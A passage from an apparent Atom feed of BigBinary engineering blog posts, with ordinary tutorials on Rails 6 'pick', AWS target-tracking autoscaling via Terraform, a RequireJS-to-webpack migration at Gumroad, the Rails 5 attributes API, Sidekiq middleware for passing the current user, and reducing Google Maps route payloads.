features!&quot;</code></pre><p>This method <a href="https://github.com/rails/rails/blob/45b898afc07dca936df13795dd5179bff5ae9a90/activerecord/lib/active_record/relation/calculations.rb#L203-L219">internally applies</a> <code>limit(1)</code> on the relation beforepicking up the first value.So it is usefulwhen the relation is already reduced to a single row.</p><p>It can also select values for multiple columns.</p><pre><code class="language-ruby">&gt;&gt; Post.where(category: &quot;Rails 6&quot;).pick(:name, :author)   SELECT &quot;posts&quot;.&quot;name&quot;, &quot;posts&quot;.&quot;author&quot;   FROM &quot;posts&quot;   WHERE &quot;posts&quot;.&quot;category&quot; = ?   LIMIT ?  [[&quot;category&quot;, &quot;Rails 6&quot;], [&quot;LIMIT&quot;, 1]]=&gt; [&quot;Rails 6.0 new features&quot;, &quot;prathamesh&quot;]</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Target Tracking Policy for Auto Scaling]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/target-tracking-policy-for-auto-scaling"/>
      <updated>2019-01-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/target-tracking-policy-for-auto-scaling</id>
      <content type="html"><![CDATA[<p>In July 2017, AWS<a href="https://aws.amazon.com/about-aws/whats-new/2017/07/introducing-target-tracking-scaling-policies-for-auto-scaling/">introduced</a>Target Tracking Policy for Auto Scaling in EC2. It helps to autoscale based onthe metrics like Average CPU Utilization, Load balancer request per target, andso on. Simply stated it scales up and down the resources to keep the metric at afixed value. For example, if the configured metric is Average CPU Utilizationand the value is 60%, the Target Tracking Policy will launch more instances ifthe Average CPU Utilization goes beyond 60%. It will automatically scale downwhen the usage decreases. Target Tracking Policy works using a set of CloudWatchalarms which are automatically set when the policy is configured.</p><p>It can be configured in <code>EC2 -&gt; Auto Scaling Groups -&gt; Scaling Policies</code>.</p><p><img src="/blog_images/2019/target-tracking-policy-for-auto-scaling/ec2_target_tracking_policy.png" alt="EC2 Target Tracking Policy"></p><p>We can also configure a warm-up period so that it would wait before it launchesmore instances to keep the metric at the configured value.</p><p>Internally, we use terraform to manage AWS resources. We can configure TargetTracking Policy using terraform as follows.</p><pre><code class="language-hcl">resource &quot;aws_launch_configuration&quot; &quot;web_cluster&quot; {name_prefix = &quot;staging-web-cluster&quot;image_id = &quot;&lt;image ID&gt;&quot;instance_type = &quot;&lt;instance type&gt;&quot;key_name = &quot;&lt;ssh key name&gt;&quot;security_groups = [&quot;&lt;security group&gt;&quot;]user_data = &quot;&lt;user_data script&gt;&quot;root_block_device {volume_size = &quot;&lt;volume size&gt;&quot;}lifecycle {create_before_destroy = true}}resource &quot;aws_autoscaling_group&quot; &quot;web_cluster&quot; {name = &quot;staging-web-cluster-asg&quot;min_size = &quot;&lt;min ASG size&gt;&quot;max_size = &quot;&lt;max ASG size&gt;&quot;default_cooldown = &quot;300&quot;launch_configuration = &quot;\${ aws_launch_configuration.web_cluster.name }&quot;vpc_zone_identifier = [&quot;&lt;subnet ID&gt;&quot;]health_check_type = &quot;EC2&quot;health_check_grace_period = 300target_group_arns = [&quot;&lt;target group arn&gt;&quot;]}resource &quot;aws_autoscaling_policy&quot; &quot;web_cluster_target_tracking_policy&quot; {name = &quot;staging-web-cluster-target-tracking-policy&quot;policy_type = &quot;TargetTrackingScaling&quot;autoscaling_group_name = &quot;\${aws_autoscaling_group.web_cluster.name}&quot;estimated_instance_warmup = 200target_tracking_configuration {predefined_metric_specification {predefined_metric_type = &quot;ASGAverageCPUUtilization&quot;}    target_value = &quot;60&quot;}}</code></pre><p>Target Tracking Policy allows us to easily configure and manage autoscaling inEC2. It's particularly helpful while running services like web servers.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Migrating Gumroad from RequireJS to webpack]]></title>
       <author><name>Sharang Dashputre</name></author>
      <link href="https://www.bigbinary.com/blog/migrating-gumroad-from-requirejs-to-webpack"/>
      <updated>2018-12-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/migrating-gumroad-from-requirejs-to-webpack</id>
      <content type="html"><![CDATA[<p><em>BigBinary has been working with <a href="https://gumroad.com">Gumroad</a> for a while.Following blog post has been posted with permission from Gumroad and we are verygrateful to <a href="https://twitter.com/shl">Sahil</a> for allowing us to discuss the workin such an open environment.</em></p><p>This application is a JavaScript-heavy application as most consumer-orientedapplications are these days. We recently changed the JavaScript build system forGumroad from <a href="https://requirejs.org/">RequireJS</a> to<a href="https://webpack.js.org/">webpack</a>. We'd like to talk about how we went aboutdoing this.</p><p>Gumroad's web application is built using Ruby on Rails. The project was startedway back in 2011 as<a href="https://news.ycombinator.com/item?id=2406614">this hacker news post</a> suggests.When we began working on the code it was building JavaScript assets through twosystems <a href="https://github.com/rails/sprockets">Sprockets</a> and RequireJS. From whatwe could tell, all the code which was using a new(at the time) frontendframework was processed by RequireJS first and then sprockets whereas theJavaScript files which are usually present under <code>app/javascrips/assets</code> and<code>vendor/assets/javascripts</code> in a typical Rails application were present as wellbut they were not being processed by RequireJS. Also, there were some librarieswhich were sourced using <a href="https://bower.io/">Bower</a>.</p><p>We were tasked with the work of migrating the RequireJS build system over towebpack and replacing Bower with NPM. The reason behind this was that we wantedto use newer tools with wider community support. Another reason was that wewanted to be able to take advantage of all the goodies that webpack comes withthough that was not a strong motivation at that point.</p><p>We decided to break down the task into small pieces which could be worked on initerations and, more importantly, could be shipped in iterations. This wouldenable us to work on other tasks in the application in parallel and not beblocked on a big chunk of work. Keeping that in mind we split the task in threedifferent steps.</p><p>Step 1: Migrate from RequireJS to webpack with the minimal amount of changes inthe actual code.</p><p>Step 2: Use NPM packages in place of Bower components.</p><p>Step 3: Use NPM packages in place of libraries present under<code>vendor/assets/javascripts</code>.</p><h2>Step 1: Migrate from RequireJS to webpack with the minimal amount of changes in the actual code</h2><p>The first thing we did here was create a new <code>webpack.config.js</code> configurationfile which would be used by webpack. We did our best to accurately translate theconfiguration from the RequireJS configuration file using multiple resourcesavailable online.</p><p>Here is how most JavaScript files which were to be processed by RequireJS lookedlike.</p><pre><code class="language-javascript">&quot;use strict&quot;;define([&quot;braintree&quot;, &quot;$app/ui/product/edit&quot;, &quot;$app/data/product&quot;], function (  Braintree,  ProductEditUI,  ProductData) {  // Do something with Braintree, ProductEditUI, and ProductData});</code></pre><p>As you can see, the code did not use the newer<a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import">import</a>statements which you'd see in comparatively newer JavaScript code. As we'vementioned earlier, our goal was to have minimal code changes so we did not wantto change to <code>import</code> just yet. Luckily for us, webpack supports the<a href="https://github.com/amdjs/amdjs-api/wiki/AMD#define-function-">define API</a> forspecifying dependencies. This meant that we would not need to change howdependencies were specified in any of the JavaScript files.</p><p>In this step we also changed the build system configuration (Thewebpack.config.js file in this case) to use NPM packages where possible insteadof using libraries from the <code>vendor/</code> directory. This meant that we would needto have aliases in place for instances where the package name was different fromthe names we had aliased the libraries to.</p><p>For example, this is how the 'braintree' alias was set earlier in order to referto the Braintree SDK. Now all the code had to do was to mention that <code>braintree</code>was a dependency.</p><pre><code class="language-javascript">require.config({  paths: {    braintree: &quot;/vendor/assets/javascripts/braintree-2.16.0&quot;,  },});</code></pre><p>With the change to use the NPM package in place of the JavaScript file thedependency sourcing did not work as expected because the NPM package name was'braintree-web' and the source code was trying to load 'braintree' which was notknown to the build system(webpack). In order to avoid making changes to sourcecode we used the<a href="https://webpack.js.org/configuration/resolve/#resolve-alias">&quot;alias&quot; feature</a>provided by webpack as shown below.</p><pre><code class="language-javascript">module.exports = {  resolve: {    alias: {      braintree: &quot;braintree-web&quot;,    },  },};</code></pre><p>We did this for all the dependencies which had been given an alias in theRequireJS configuration and we got dependency resolution to work as expected.</p><p>As a part of this step, we also created a new common chunk and used it toimprove caching. You can read more about this feature<a href="https://webpack.js.org/plugins/split-chunks-plugin/#split-chunks-example-1">here</a>.Note that we would tweak this iteratively later but we thought it would be goodto get started with the basic configuration right away.</p><h2>Step 2: Use NPM packages in place of Bower components</h2><p>Another goal of the migration was to remove Bower so as to make the build systemsimpler. The first reason behind this was that all Bower packages which we wereusing were available as NPM packages. The second reason was that Bower itself isrecommending users to migrate to Yarn/webpack for a while now.</p><p>What we did here was simple. We removed Bower and the Bower configuration file.Then, we sourced the required Bower components as NPM packages instead by addingthem to <code>package.json</code>. We also removed the aliases added to source them fromthe webpack configuration.</p><p>For example, here's the change required to the configuration file after sourcing<code>clipboard</code> as an NPM package instead of a Bower component.</p><pre><code class="language-diff">resolve: {  alias: {    // Other Code    $app:           path.resolve(__dirname, '../../app/javascript'),    $lib:           path.resolve(__dirname, '../../lib/assets/javascripts')-   clipboard:      path.resolve(__dirname, '../../vendor/assets/javascripts/clipboard.min.js')  }}</code></pre><h2>Step 3: Use NPM packages in place of libraries present under <code>vendor/assets/javascripts</code></h2><p>We had a lot of javascript libraries present under <code>vendor/assets/javascripts</code>which were sourced in the required javascript files. We deleted those files fromthe project and sourced them as NPM packages instead. This way we could havebetter visibility and control over the versions of these packages.</p><p>As part of this migration we also did some asset-related cleanups. Theseincluded removing unused JavaScript files, including JavaScript files only whererequired instead of sourcing them into the global scope, etc.</p><p>We were continuously measuring the performance of the application before andafter applying changes to make sure that we were not worsening the performanceduring the migration. In the end, we found that we had improved the page loadspeeds by an average of 2%. Note that this task was not undertaken to improvethe performance of the application. We are now planning to leverage webpackfeatures and try to improve on this metric further.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Active Record attributes API]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-attributes-api"/>
      <updated>2018-12-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-attributes-api</id>
      <content type="html"><![CDATA[<p>Rails 5 was a major release with a lot of new features like Action Cable, APIApplications, etc. Active Record attribute API was also one of the features ofRails 5 release which did not receive much attention.</p><p>Active Record attributes API is used by Rails internally for a long time. InRails 5 release, attributes API was made public and allowed support for customtypes.</p><h4>What is attribute API?</h4><p>Attribute API converts the attribute value to an appropriate Ruby type. Here ishow the syntax looks like.</p><pre><code class="language-ruby">attribute(name, cast_type, options)</code></pre><p>The first argument is the name of the attribute and the second argument is thecast type. Cast type can be <code>string</code>, <code>integer</code> or custom type object.</p><pre><code class="language-ruby"># db/schema.rbcreate_table :movie_tickets, force: true do |t|  t.float :priceend# without attribute APIclass MovieTicket &lt; ActiveRecord::Baseendmovie_ticket = MovieTicket.new(price: 145.40)movie_ticket.save!movie_ticket.price   # =&gt; Float(145.40)# with attribute APIclass MovieTicket &lt; ActiveRecord::Base  attribute :price, :integerendmovie_ticket.price   # =&gt; 145</code></pre><p>Before using attribute API, movie ticket price was a float value, but afterapplying attribute on price, the price value was typecast as integer.</p><p>The database still stores the price as float and this conversion happens only inRuby land.</p><p>Now, we will typecast movie <code>release_date</code> from <code>datetime</code> to <code>date</code> type.</p><pre><code class="language-ruby"># db/schema.rbcreate_table :movies, force: true do |t|  t.datetime :release_dateendclass Movie &lt; ActiveRecord::Base  attribute :release_date, :dateendmovie.release_date # =&gt; Thu, 01 Mar 2018</code></pre><p>We can also add default value for an attribute.</p><pre><code class="language-ruby"># db/schema.rbcreate_table :movies, force: true do |t|  t.string :license_number, :stringendclass Movie &lt; ActiveRecord::Base  attribute :license_number,            :string,            default: &quot;IN00#{Date.current.strftime('%Y%m%d')}00#{rand(100)}&quot;end# without attribute API with default value on license numberMovie.new.license_number  # =&gt; nil# with attribute API with default value on license numberMovie.new.license_number  # =&gt; &quot;IN00201805250068&quot;</code></pre><h4>Custom Types</h4><p>Let's say we want the people to rate a movie in percentage. Traditionally, wewould do something like this.</p><pre><code class="language-ruby">class MovieRating &lt; ActiveRecord::Base  TOTAL_STARS = 5  before_save :convert_percent_rating_to_stars  def convert_percent_rating_to_stars    rating_in_percentage = value.gsub(/\%/, '').to_f    self.rating = (rating_in_percentage * TOTAL_STARS) / 100  endend</code></pre><p>With attributes API we can create a custom type which will be responsible tocast to percentage rating to number of stars.</p><p>We have to define the <code>cast</code> method in the custom type class which casts thegiven value to the expected output.</p><pre><code class="language-ruby"># db/schema.rbcreate_table :movie_ratings, force: true do |t|  t.integer :ratingend# app/types/star_rating_type.rbclass StarRatingType &lt; ActiveRecord::Type::Integer  TOTAL_STARS = 5  def cast(value)    if value.present? &amp;&amp; !value.kind_of?(Integer)      rating_in_percentage = value.gsub(/\%/, '').to_i      star_rating = (rating_in_percentage * TOTAL_STARS) / 100      super(star_rating)    else      super    end  endend# config/initializers/types.rbActiveRecord::Type.register(:star_rating, StarRatingType)# app/models/movie.rbclass MovieRating &lt; ActiveRecord::Base  attribute :rating, :star_ratingend</code></pre><h4>Querying</h4><p>The attributes API also supports <code>where</code> clause. Query will be converted to SQLby calling <code>serialize</code> method on the type object.</p><pre><code class="language-ruby">class StarRatingType &lt; ActiveRecord::Type::Integer  TOTAL_STARS = 5  def serialize(value)    if value.present? &amp;&amp; !value.kind_of?(Integer)      rating_in_percentage = value.gsub(/\%/, '').to_i      star_rating = (rating_in_percentage * TOTAL_STARS) / 100      super(star_rating)    else      super    end  endend# Add new movie rating with rating as 25.6%.# So the movie rating in star will be 1 of 5 stars.movie_rating = MovieRating.new(rating: &quot;25.6%&quot;)movie_rating.save!movie_rating.rating   # =&gt; 1# Querying with rating in percentage 25.6%MovieRating.where(rating: &quot;25.6%&quot;)# =&gt; #&lt;ActiveRecord::Relation [#&lt;MovieRating id: 1000, rating: 1 ... &gt;]&gt;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Passing current_user by default in Sidekiq]]></title>
       <author><name>Ashish Gaur</name></author>
      <link href="https://www.bigbinary.com/blog/passing-current-user-by-default-in-sidekiq"/>
      <updated>2018-12-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/passing-current-user-by-default-in-sidekiq</id>
      <content type="html"><![CDATA[<p>In one of our projects we need to capture user activitythroughout the application.For example when a user updates projected distance of a delivery,the application should create an activity for that action.To create an activitywe need the currently logged in user idsince we need to associatethe activity with that user.</p><p>We are using <code>devise</code> gem for authenticationwhich provides <code>current_user</code> method by defaultto controllers.Any business logic residing at controller levelcan use <code>current_user</code>to associate the activitywith the logged in user.However, some business logicsreside in Sidekiqwhere <code>current_user</code> is not available.</p><h2>Passing <code>current_user</code> to Sidekiq job</h2><p>One way to solve this issueis to pass the <code>current_user</code> directlyto the Sidekiq job.Here's how we can do it.</p><pre><code class="language-ruby">  class DeliveryController &lt; ApplicationController    def update      # update attributes      DeliveryUpdateWorker.        perform_async(params[:delivery], current_user.login)      # render delivery    end  end</code></pre><pre><code class="language-ruby">  class DeliveryUpdateWorker    include Sidekiq::Worker    def perform(delivery, user_login)      user = User.find_by(login: user_login)      ActivityGenerationService.new(delivery, user) if user    end  end</code></pre><p>That works.Now let's say we add another endpointin which we need to trackwhen delivery is deleted.Here's the updated code.</p><pre><code class="language-ruby">  class DeliveryController &lt; ApplicationController    def update      # update attributes      DeliveryUpdateWorker.        perform_async(params[:delivery], current_user.login)      # render delivery    end    def destroy      # delete attributes      DeliveryDeleteWorker.        perform_async(params[:delivery], current_user.login)      # render :ok    end  end</code></pre><pre><code class="language-ruby">  class DeliveryDeleteWorker    include Sidekiq::Worker    def perform(delivery, user_login)      user = User.find_by(login: user_login)      ActivityGenerationService.new(delivery, user) if user    end  end</code></pre><p>Again we needed to pass<code>current_user</code> loginin the new endpoint.You can notice a pattern here.For each endpoint which needsto track activitywe need to pass <code>current_user</code>.What if we could pass <code>current_user</code> infoby default.</p><p>The main reason we want topass <code>current_user</code> by defaultis because we're tracking model attributechanges in the model's <code>before_save</code> callbacks.</p><p>For this we store <code>current_user</code>info in <code>Thread.current</code> and accessit in <code>before_save</code> callbacksof the model whichgenerated relevant activity.</p><p>This will work fine formodel attribute changes made incontrollers and serviceswhere <code>Thread.current</code> isaccessible and persisted.However, for Sidekiq jobswhich changes the model attributeswhose activity is generated,we need to pass the <code>current_user</code>manually since <code>Thread.current</code>is not available in Sidekiq jobs.</p><p>Again we can argue here thatwe don't need to pass the <code>current_user</code>by default. Instead we can pass itin each Sidekiq job as an argument.This will work in simple cases,although for more complex casesthis will require extra effort.</p><p>For eg. let's say we're trackingdelivery's cost. We've three sidekiqjobs, <code>DeliveryDestinationChangeWorker</code>,<code>DeliveryRouteChangeWorker</code> and <code>DeliveryCostChangeWorker</code>.We call <code>DeliveryDestinationChangeWorker</code>which changes the destination of a delivery.This calls <code>DeliveryRouteChangeWorker</code> whichcalculates the new route and calls<code>DeliveryCostChangeWorker</code>. Now<code>DeliveryCostChangeWorker</code> changes the deliverycost where the <code>before_save</code> callback is called.</p><p>In this example you can seethat we need to pass <code>current_user</code>through all three Sidekiq workersand initialize <code>Thread.current</code>in <code>DeliveryCostChangeWorker</code>.The nesting can go much deeper.</p><p>Passing <code>current_user</code> by defaultwill make sure if the activity isbeing generated in a model's<code>before_save</code> callback thenit can access the <code>current_user</code>info from <code>Thread.current</code> nomatter how much nested the Sidekiqcall chain is.</p><p>Also it makes sure thatif a developer adds anotherSidekiq worker classin the future whichchanges a model whoseattribute change needs to be tracked.Then the developer need notremember to pass<code>current_user</code> explicitlyto the Sidekiq worker.</p><p>Note the presented problemin this blog isan oversimplified versionin order to better presentthe solution.</p><h2>Creating a wrapper module to include <code>current_user</code> by default</h2><p>The most basic solution topass <code>current_user</code> by defaultis to create a wrapper module.This module will be responsiblefor adding the <code>current_user</code>when <code>perform_async</code> is invoked.Here's an example.</p><pre><code class="language-ruby">  module SidekiqMediator    def perform_async(klass, *args)      args.push(current_user.login)      klass.send(:perform_async, *args)    end  end</code></pre><pre><code class="language-ruby">  class DeliveryController &lt; ApplicationController    include SidekiqMediator    def update      # update attributes      perform_async(DeliveryUpdateWorker, params[:delivery])      # render delivery    end    def destroy      # delete attributes      perform_async(DeliveryDeleteWorker, params[:delivery])      # render :ok    end  end</code></pre><pre><code class="language-ruby">  class DeliveryDeleteWorker    include Sidekiq::Worker    def perform(delivery, user_login)      user = User.find_by(login: user_login)      ActivityGenerationService.new(delivery, user) if user    end  end</code></pre><p>Now we don't need to pass<code>current_user</code> login in each call.However we still need toremember including <code>SidekiqMediator</code>whenever we need to use <code>current_user</code>in the Sidekiq jobfor activity generation.Another way to solve this problemis to intercept the Sidekiq jobbefore it is pushed to redis.Then we can include <code>current_user</code> login by default.</p><h2>Using Sidekiq client middleware to pass <code>current_user</code> by default</h2><p>Sidekiq provides a client middlewareto run custom logicbefore pushing the job in redis.We can use the client middlewareto push <code>current_user</code> as default argumentin the Sidekiq arguments.Here's an example of Sidekiq client middleware.</p><pre><code class="language-ruby">  class SidekiqClientMiddleware    def call(worker_class, job, queue, redis_pool = nil)      # Do something before pushing the job in redis      yield    end  end</code></pre><p>We need a way to introduce<code>current_user</code>in the Sidekiq arguments.The<a href="https://github.com/mperham/sidekiq/wiki/Job-Format">job</a>payload contains the arguments passed to the Sidekiq worker.Here's what the <code>job</code> payload looks like.</p><pre><code class="language-json">  {    &quot;class&quot;: &quot;DeliveryDeleteWorker&quot;,    &quot;jid&quot;: &quot;b4a577edbccf1d805744efa9&quot;,    &quot;args&quot;: [1, &quot;arg&quot;, true],    &quot;created_at&quot;: 1234567890,    &quot;enqueued_at&quot;: 1234567890  }</code></pre><p>Notice here the <code>args</code> key which is an arraycontaining the arguments passedto the Sidekiq worker.We can push the <code>current_user</code>in the <code>args</code> array.This way each Sidekiq jobwill have <code>current_user</code> by defaultas the last argument.Here's the modified versionof the client middlewarewhich includes <code>current_user</code> by default.</p><pre><code class="language-ruby">  class SidekiqClientMiddleware    def call(_worker_class, job, _queue, _redis_pool = nil)      # Push current user login as the last argument by default      job['args'].push(current_user.login)      yield    end  end</code></pre><p>Now we don't need topass <code>current_user</code> login to Sidekiq workersin the controller.Here's how our controller logiclooks like now.</p><pre><code class="language-ruby">  class DeliveryController &lt; ApplicationController    def update      # update attributes      DeliveryUpdateWorker.perform_async(params[:data])      # render delivery    end    def destroy      # delete attributes      DeliveryDeleteWorker.perform_async(params[:data])      # render :ok    end  end</code></pre><p>We don't need<code>SidekiqMediator</code> anymore.The <code>current_user</code> will automaticallybe included as the last argumentin every Sidekiq job.</p><p>Although there's one issue here.We included <code>current_user</code>by default to every Sidekiq worker.This means workerswhich does not expect <code>current_user</code>as an argument will also have<code>current_user</code> as their last argument.This will raise <code>ArgumentError: wrong number of arguments (2 for 1)</code>.Here's an example.</p><pre><code class="language-ruby">  class DeliveryCreateWorker    include Sidekiq::Worker    def perform(data)      # doesn't use current_user login to track activity when called      # this will get data, current_user_login as the arguments    end  end</code></pre><p>To solve this we need toextract <code>current_user</code>argument from <code>job['args']</code>before the worker starts processing.</p><h2>Using Sidekiq server middleware to extract <code>current_user</code> login</h2><p>Sidekiq also providesserver middlewarewhich runs before processingany Sidekiq job.We used this toextract <code>current_user</code>from <code>job['args']</code>and saved it in a global state.</p><p>This global stateshould persist whenthe server middleware executionis completeand the actual Sidekiq jobprocessing has started.Here's the server middleware.</p><pre><code class="language-ruby">  class SidekiqServerMiddleware    def call(_worker, job, _queue)      set_request_user(job['args'].pop)      yield    end    private    def set_request_user(request_user_login)      RequestStore.store[:request_user_login] = request_user_login    end  end</code></pre><p>Notice here we used <code>pop</code>to extractthe last argument.Since we're settingthe last argumentto <code>current_user</code>in the client middleware,the last argumentwill always be the<code>current_user</code>in server middleware.</p><p>Using <code>pop</code> also removes<code>current_user</code>from <code>job['args']</code>which ensures the workerdoes not get<code>current_user</code>as an extra argument.</p><p>We used<a href="https://github.com/steveklabnik/request_store">request_store</a>to persist a global state.<code>RequestStore</code> providesa per request global storageusing <code>Thread.current</code>which stores infoas a key value pair.Here's how we used itin Sidekiq workersto access the <code>current_user</code> info.</p><pre><code class="language-ruby">  class DeliveryDeleteWorker    include Sidekiq::Worker    def perform(delivery)      user_login = RequestStore.store[:request_user_login]      user = User.find_by(login: user_login)      ActivityGenerationService.new(delivery, user) if user    end  end</code></pre><p>Now we don't need to pass<code>current_user</code>in the controllerwhen calling the Sidekiq worker.Also we don't need toadd <code>user_login</code>as an extra argumentin each Sidekiq workerevery time we need toaccess <code>current_user</code>.</p><h2>Configure server middleware for Sidekiq test cases</h2><p>By default Sidekiqdoes not runserver middlewarein <code>inline</code> and <code>fake</code> mode.</p><p>Because of this<code>current_user</code>was being added in theclient middlewarebut it's not being extractedin the server middlewaresince it's never called.</p><p>This resulted in<code>ArgumentError: wrong number of arguments (2 for 1)</code>failures in our test caseswhich used Sidekiq in<code>inline</code> or <code>fake</code> mode.We solved this by adding following config:</p><pre><code class="language-ruby">  Sidekiq::Testing.server_middleware do |chain|    chain.add SidekiqServerMiddleware  end</code></pre><p>This ensures that <code>SidekiqServerMiddleware</code>is called in<code>inline</code> and <code>fake</code> modein our test cases.</p><p>However, we found an alternativeto this which was muchsimpler and cleaner.We noticed that <code>job</code> payloadis a simple hashwhich is pushed to redisas it isand is availablein the server middlewareas well.</p><p>Instead of adding the<code>current_user</code>as an argument in <code>job['args']</code>we could add another keyin <code>job</code> payload itselfwhich will hold the<code>current_user</code>.Here's the modified logic.</p><pre><code class="language-ruby">  class SidekiqClientMiddleware    def call(_worker_class, job, _queue, _redis_pool = nil)      # Set current user login in job payload      job['request_user_login'] = current_user.login if defined?(current_user)      yield    end  end</code></pre><pre><code class="language-ruby">  class SidekiqServerMiddleware    def call(_worker, job, _queue)      if job.key?('request_user_login')        set_request_user(job['request_user_login'])      end      yield    end    private    def set_request_user(request_user_login)      RequestStore.store[:request_user_login] = request_user_login    end  end</code></pre><p>We used a unique key<code>request_user_login</code>which would not conflict withthe other keys in the<code>job</code> payload.Additionally we addeda check if <code>request_user_login</code> keyis present in the <code>job</code> payload.This is necessarybecause if the user callsthe worker from consolethen it'll not have <code>current_user</code> set.</p><p>Apart from this we noticedthat we had multiple api servicestalking to each other.These services also generated user activity.Few of them didn't use <code>Devise</code>for authentication,instead the requesting user infowas passed to them in each requestas param.</p><p>For these serviceswe set the request user infoin <code>RequestStore.store</code>in our <code>BaseApiController</code>and changed the client middlewareto use <code>RequestStore.store</code>instead of <code>current_user</code> method.</p><p>We also initialized <code>RequestStore.store</code>in serviceswhere we used <code>Devise</code>to make it completely independentof <code>current_user</code>.Here's how our client middlewarelooks now.</p><pre><code class="language-ruby">  class SidekiqClientMiddleware    def call(_worker_class, job, _queue, _redis_pool = nil)      # Set current user login in job payload      if RequestStore.store[:request_user_login]        job['request_user_login'] = RequestStore.store[:request_user_login]      end      yield    end  end</code></pre><p>Lastly we needed toregister the clientand server middlewarein Sidekiq.</p><h2>Configuring Sidekiq middleware</h2><p>To enable the middlewarewith Sidekiq,we need to registerthe client middlewareand the server middlewarein <code>config/initializers/sidekiq.rb</code>.Here's how we did it.</p><pre><code class="language-ruby">Sidekiq.configure_client do |config|  config.client_middleware do |chain|    chain.add SidekiqClientMiddleware  endendSidekiq.configure_server do |config|  config.client_middleware do |chain|    chain.add SidekiqClientMiddleware  end  config.server_middleware do |chain|    chain.add SidekiqServerMiddleware  endend</code></pre><p>Notice that we added <code>SidekiqClientMiddleware</code>in both<code>configure_server</code> blockand <code>configure_client</code> block,this is becausea Sidekiq job can callanother Sidekiq jobin which casethe Sidekiq server itselfwill act as the client.</p><p>To sum it up,here's how our client middlewareand server middlewarefinally looked like.</p><pre><code class="language-ruby">  class SidekiqClientMiddleware    def call(_worker_class, job, _queue, _redis_pool = nil)      # Set current user login in job payload      if RequestStore.store[:request_user_login]        job['request_user_login'] = RequestStore.store[:request_user_login]      end      yield    end  end</code></pre><pre><code class="language-ruby">  class SidekiqServerMiddleware    def call(_worker, job, _queue)      if job.key?('request_user_login')        set_request_user(job['request_user_login'])      end      yield    end    private    def set_request_user(request_user_login)      RequestStore.store[:request_user_login] = request_user_login    end  end</code></pre><p>The controller examplewe mentioned initially looks like:</p><pre><code class="language-ruby">  class DeliveryController &lt; ApplicationController    def update      # update attributes      DeliveryUpdateWorker.perform_async(params[:delivery])      # render delivery    end    def destroy      # delete attributes      DeliveryDeleteWorker.perform_async(params[:delivery])      # render :ok    end  end</code></pre><pre><code class="language-ruby">  class DeliveryDeleteWorker    include Sidekiq::Worker    def perform(delivery)      user_login = RequestStore.store[:request_user_login]      user = User.find_by(login: user_login)      ActivityGenerationService.new(delivery, user) if user    end  end</code></pre><pre><code class="language-ruby">  class DeliveryUpdateWorker    include Sidekiq::Worker    def perform(delivery)      user_login = RequestStore.store[:request_user_login]      user = User.find_by(login: user_login)      ActivityGenerationService.new(delivery, user) if user    end  end</code></pre><p>Now we don't need toexplicitly pass <code>current_user</code>to each Sidekiq job.It's available out of the boxwithout any changesin all Sidekiq jobs.</p><p>As an alternative we can also use<a href="https://github.com/rails/rails/pull/29180">ActiveSupport::CurrentAttributes</a>.</p><p><a href="https://www.reddit.com/r/ruby/comments/a3ecbv/passing_current_user_by_default_in_sidekiq">Discuss it on Reddit</a></p>]]></content>
    </entry><entry>
       <title><![CDATA[Optimize Google map multi-route loading with B-spline]]></title>
       <author><name>Ashish Gaur</name></author>
      <link href="https://www.bigbinary.com/blog/using-bspline-curves-to-draw-sampled-route-points-on-google-maps"/>
      <updated>2018-12-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-bspline-curves-to-draw-sampled-route-points-on-google-maps</id>
      <content type="html"><![CDATA[<p>Applications use Google maps for showing routes from point A to B. For one ofour clients we needed to show delivery routes on Google maps so that user canselect multiple deliveries and then consolidate them as one single delivery.This meant we needed to show around 30 to 500 deliveries on a single map.</p><h2>Using Google Map polylines</h2><p>We used polylines to draw individual routes on Google maps.</p><p>Polyline is composed of line segments connecting a list of points on the map.The more points we use for drawing a polyline the more detailed the final curvewill be. Here's how we added route points to the map.</p><pre><code class="language-javascript">// List of latitude and longitudelet path = points.map(point =&gt; [point.lat, point.lng]);let route_options = {  path: path,  strokeColor: color,  strokeOpacity: 1.0,  strokeWeight: mapAttributes.strokeWeight || 3,  map: map, // google.maps.Map};new google.maps.Polyline(route_options);</code></pre><p>Here's an example of a polyline on a Google map. We used 422 latitude andlongitude points to draw these routes which makes it look more contiguous.</p><p><img src="/blog_images/2018/using-bspline-curves-to-draw-sampled-route-points-on-google-maps/polyline_example.png" alt="Polyline example"></p><p>We needed to show 200 deliveries in that map. On an average a delivery containsaround 500 route points. This means we need to load 1,00,000 route points. Let'smeasure and see how much time the whole process takes.</p><h2>Loading multiple routes on a map</h2><p>Plotting a single route on a map can be done in less than a second. However aswe increase the number of routes to plot, the payload size increases whichaffects the load time. This is because we've around 500 route points perdelivery. If we want to show 500 deliveries on the map then we need to load500 * 500 = 2,50,000 routes points. Let's benchmark the load time it takes toshow deliveries on a map.</p><p>No. of deliveries | Load Time | Payload Size | 500 | 8.77s | 12.3MB | 400 |7.76s | 10.4MB | 300 | 6.68s | 7.9MB | 200 | 5.88s | 5.3MB | 100 | 5.47s | 3.5MB|</p><p>The load time is more than 5 seconds which is high. What if we could decreasethe payload size and still be able to plot the routes.</p><h2>Sampling route points for decreased payload size</h2><p>For each delivery we've around 500 route points. If we drop a few route pointsin between on a regular interval then we'll be able to decrease the payloadsize. Latitude and longitude have at least 5 decimal points. We rounded them offto 1 decimal point and then we picked unique values.</p><pre><code class="language-ruby">  def route_lat_lng_points    return '' unless delivery.route_lat_lng_points    delivery.route_lat_lng_points.        chunk{ |point| [point.first.round(1), point.second.round(1)] }.        map(&amp;:first).join(',')  end</code></pre><p>Now let's check the payload size and the load time.</p><p>No. of deliveries | Load Time | Payload Size | 500 | 6.52s | 6.7MB | 400 | 5.97s| 5.5MB | 300 | 5.68s | 4.2MB | 200 | 4.88s | 2.9MB | 100 | 4.07s | 2.0MB |</p><p>The payload size decreased by 50 percent. However since we sampled the data theroutes are not contiguous 